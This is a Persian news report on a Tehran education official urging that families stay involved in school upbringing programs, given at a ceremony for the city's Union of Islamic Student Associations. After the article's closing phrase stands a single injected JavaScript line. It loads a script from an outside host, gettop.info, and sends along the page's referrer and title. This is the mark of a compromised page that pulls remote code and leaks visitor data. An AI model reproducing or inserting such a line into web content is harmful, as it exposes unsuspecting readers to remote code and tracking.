خانواده را از برنامه‌های تربیتی حذف نکنیم

مدیرکل آموزش و پرورش شهر تهران با تاکید بر اینکه نقش خانواده‌ها در برنامه‌های تربیتی بسیار مهم است گفت: درخواستم این است که خانواده‌ها را از برنامه‌های تربیتی حذف نکنیم.

به گزارش سادس، عباسعلی باقری در مراسم تکریم و معارفه مسئول اتحادیه انجمن های اسلامی دانش آموزان شهر تهران با بیان اینکه کارهای بزرگ را نمی‌توان به تنهایی به ثمر رساند اظهار کرد: یک کار بزرگ وجود دارد که تربیت انسانهاست. خداوند پیامبران و ائمه را برای هدایت انسان ها قرار داده است.

وی افزود: در آموزش و پرورش نیز اموری چون تربیت دانش آموزان کاری بسیار سخت است و به تنهایی امکان پذیر نیست و نیازمند مشارکت همه نهادها، اولیاء و خانواده ها و تشکل هاست.

مدیرکل آموزش و پرورش شهر تهران با بیان اینکه خرسندیم تشکل‌هایی چون انجمن های اسلامی همراه ما هستند گفت: در حوزه تعلیم و تربیت کار کردن به تعبیر شهید رجایی عشق می خواهد و بدون آن بسیار دشوار است. همکاران ما در انجمن های اسلامی اقدامات خوبی انجام دادند و امیدوارم امسال هم برنامه های خوبی اجرا کنند.

باقری افزود: نقش خانواده‌ها در برنامه‌های تربیتی بسیار مهم است و درخواستم این است که خانواده‌ها را از برنامه‌های تربیتی حذف نکنیم. خانواده‌ها باید درگیر شوند. به تعبیر مقام معظم رهبری، خانواده در دوران ما همانند تنگه احد است و اگر می‌خواهیم انقلاب را حفظ کنیم باید این تنگه را صیانت کنیم.

به گزارش سادس، میثم نعمتی مسئول سابق اتحادیه انجمن های اسلامی شهر تهران در این مراسم اظهار کرد: ظرفیت خوبی در اتحادیه ایجاد شده است وامروز 500 انجمن اسلامی فعال کیفی در پایتخت داریم.

وی افزود: به لحاظ منابع در اتحادیه جهادی کار کرده‌ایم. در اتحادیه وقتی شروع کردیم پنج فارغ‌التحصیل فعال هم نداشتیم اما اکنون150 فارغ‌التحصیل دختر و پسر مستعد و توانمند داریم که ظرفیت خوبی برای مربی شدن هستند. امیدواریم شاهد رشد و بالندگی بیشتری در اتحادیه تهران باشیم.

به گزارش سادس، کریمی معاون پرورشی و فرهنگی آموزش و پرورش شهر تهران نیز در این مراسم با بیان اینکه اتحادیه انجمن های اسلامی دانش آموزان دارای قدمتی دیرینه است گفت: اتحادیه در یک تعریف خط ولایت است که در عمق وحود همه ما ریشه دارد.

وی افزود: در تیم کاری اتحادیه چیزی جز صداقت ندیدیم. مدرسه انقلاب جزو طرح های خوب اتحادیه است که به دنبال آموزش مهارت های زندگی، خودباوری، شناسایی تهدیدها و تبدیل آنها به فرصتهاست. مهم است که در عمق وجود یک نوجوان ریشه بدوانیم. اگر قرار است انسانی را تربیت کنیم، باید برای آن وقت بگذاریم و سرمایه گذاری کنیم.

کریمی با بیان اینکه تربیت زمان و مکان نمی شناسد گفت: تا جایی که توانستیم منابع و امکانات خود را برای تربیت نوجوانان در اختیار اتحادیه قرار دادیم.

انتهای پیام

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

دسته‌بندی نشده

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *